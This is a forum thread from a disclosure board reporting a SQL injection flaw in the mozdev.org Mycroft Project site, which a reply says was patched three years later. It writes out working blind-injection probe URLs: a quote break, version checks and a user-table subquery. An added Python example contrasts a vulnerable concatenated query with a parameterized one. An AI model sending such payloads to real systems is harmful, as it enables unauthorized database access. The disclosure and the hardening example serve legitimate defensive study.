Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
mozdev.org Mycroft Project: Vulnerable to sql injection
Posted by: VMw4r3
Date: August 23, 2010 04:46PM

mozdev.org

Mycroft Project is vulnerable to SQL injection.

Injection:

hxxp://mycroft.mozdev.org/search-engines.html?category=64'

MySQL version check:

hxxp://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=4 <-----true




hxxp://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=5 <-----false



Error generated looking for inexistent user table:

hxxp://mycroft.mozdev.org/search-engines.html?category=64 and (select 1 from user limit 0,1)=1
error = SELECT command denied to user 'pr_mycroft'@'localhost' for table 'user'







http://vmw4r3.blogspot.com/
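
The true/false behaviour reported in the post above, reproduced as an added example that is not part of the original post or of the Mycroft code base. It uses an in-memory SQLite database with a constructed `engines` table (table, column and function names are assumptions) and a generic `1=1` / `1=2` condition in place of the MySQL version test, to show why quote escaping does not help in an unquoted numeric context and what the validated, parameterized form does instead.

```python
import sqlite3

def make_db():
    # Constructed stand-in data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE engines (id INTEGER PRIMARY KEY, name TEXT, category INTEGER)")
    db.executemany("INSERT INTO engines (name, category) VALUES (?, ?)",
                   [("alpha", 64), ("beta", 64), ("gamma", 7)])
    return db

def search_concat(db, category):
    # Vulnerable pattern: the raw parameter lands in an unquoted numeric context.
    sql = "SELECT name FROM engines WHERE category = " + category + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def search_escaped(db, category):
    # Quote escaping alone changes nothing here: the condition needs no quotes.
    escaped = category.replace("'", "''")
    sql = "SELECT name FROM engines WHERE category = " + escaped + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def search_safe(db, category):
    # Hardened: strict integer validation, then a bound parameter.
    if not (category.isascii() and category.isdigit() and len(category) <= 9):
        raise ValueError("category must be a non-negative integer")
    sql = "SELECT name FROM engines WHERE category = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (int(category),))]

def compare(values=("64", "64 and 1=1", "64 and 1=2")):
    # Run each handler on each input; a differing true/false answer is the leak.
    db = make_db()
    table = {}
    for value in values:
        for handler in (search_concat, search_escaped, search_safe):
            try:
                outcome = handler(db, value)
            except ValueError:
                outcome = "rejected"
            table[(handler.__name__, value)] = outcome
    return table

if __name__ == "__main__":
    for key, outcome in compare().items():
        print(key, "->", outcome)
```

The "SELECT command denied" error quoted in the post shows the database account lacked rights on the `user` table, which limits what the injection can reach but does not remove it.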

Re: mozdev.org Mycroft Project: Vulnerable to sql injection
Posted by: us3r
Date: July 03, 2013 12:01PM

After 3 years the site has been patched! :)
